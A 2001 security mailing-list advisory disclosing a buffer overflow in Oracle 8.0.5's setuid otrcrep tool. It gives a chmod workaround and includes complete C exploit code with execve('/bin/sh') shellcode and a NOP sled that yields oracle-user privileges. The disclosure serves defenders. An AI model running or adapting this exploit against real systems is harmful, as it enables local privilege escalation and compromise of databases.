[UNIX] Vulnerability in 'otrcrep' in Oracle ('a' Parameter)

From: support@securiteam.com
Date: 08/12/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] Vulnerability in 'otrcrep' in Oracle ('a' Parameter)
Message-Id: <20010812203427.EA888138BF@mail.der-keiler.de>
Date: Sun, 12 Aug 2001 22:34:27 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Vulnerability in 'otrcrep' in Oracle ('a' Parameter)
------------------------------------------------------------------------

SUMMARY

Oracle's otrcrep, an Oracle tracing program that provides formatting and
reporting options for presenting collected trace data in a useful way,
contains a security vulnerability that allows local attackers to gain
elevated privileges.

DETAILS

Vulnerable systems:
Oracle version 8.0.5

There is a buffer overflow in the otrcrep binary that can be used by local
users to obtain the euid of the oracle user and the egid of the dba group.

Impact:
Any user with local access can gain euid=oracle and compromise the
integrity of the database.

Temporary solution:
Remove the setuid bit from the program:
# chmod -s otrcrep
(NOTE: By removing the suid bit from oracle, any client connection
originating from a non-oracle user will cause Oracle to fall back to a TCP
connection instead of a pipe. Be prepared for considerable performance
degradation if you choose this tactic.)

Vendor response:
Oracle has been notified and is investigating the potential security
vulnerability.

Exploit code:
/* cc -o evolut otrcrep.c; ./evolut 300 0 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen */

#define BUFFER 300
#define OFFSET 0
#define NOP 0x90
#define BINARY "/home/oracle/app/oracle/product/8.0.5/bin/otrcrep a $EGG"
#define ORACLE_HOME "/home/oracle/app/oracle/product/8.0.5"

/* Linux/x86 execve("/bin/sh") payload */
char shellcode[] =
  "\xeb\x1d"
  "\x5e"
  "\x29\xc0"
  "\x88\x46\x07"
  "\x89\x46\x0c"
  "\x89\x76\x08"
  "\xb0\x0b"
  "\x87\xf3"
  "\x8d\x4b\x08"
  "\x8d\x53\x0c"
  "\xcd\x80"
  "\x29\xc0"
  "\x40"
  "\xcd\x80"
  "\xe8\xde\xff\xff\xff/bin/sh";

/* Return the current stack pointer (32-bit x86 only). */
unsigned long get_sp(void) {
   unsigned long sp;
   __asm__("movl %%esp,%0" : "=r"(sp));
   return sp;
}

 /* int main(int argc, char *argv[]) { */
int main(void) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset=OFFSET;

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  /* Guessed return address: current stack pointer minus a fixed delta. */
  addr = get_sp() -1420 -offset;

  /* Fill the whole buffer with the guessed address (assumes 4-byte long). */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* NOP sled over the first half of the buffer. */
  memset(buff,NOP,bsize/2);

  /* Place the shellcode in the middle of the buffer. */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  /* Hand the payload to otrcrep through the EGG environment variable. */
  setenv("ORACLE_HOME",ORACLE_HOME,1);
  setenv("EGG",buff,1);
  system(BINARY);
  return 0;
}

ADDITIONAL INFORMATION

The information has been provided by Juan Manuel Pascual Escriba
<mailto:pask@plazasite.com> and Ron Cohen <mailto:sec@rony.clara.net>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.